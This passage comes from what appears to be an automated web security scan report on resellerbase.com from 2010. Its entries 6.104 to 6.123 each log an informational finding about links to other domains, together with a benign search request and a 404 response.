<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.104. http://www.resellerbase.com/detail/11/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/11/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.105. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.106. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.107. http://www.resellerbase.com/detail/11/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.108. http://www.resellerbase.com/detail/11/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/11/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.109. http://www.resellerbase.com/detail/12/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/12/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.110. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.111. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.112. http://www.resellerbase.com/detail/12/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.113. http://www.resellerbase.com/detail/12/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/12/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.114. http://www.resellerbase.com/detail/13/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/13/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.115. http://www.resellerbase.com/detail/14/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/14/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.116. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.117. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.118. http://www.resellerbase.com/detail/14/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.119. http://www.resellerbase.com/detail/14/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/14/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.120. http://www.resellerbase.com/detail/15/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/15/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.121. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.122. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.123. http://www.resellerbase.com/detail/15/themes/kosmos/search.php

Summary

Severity:   Information
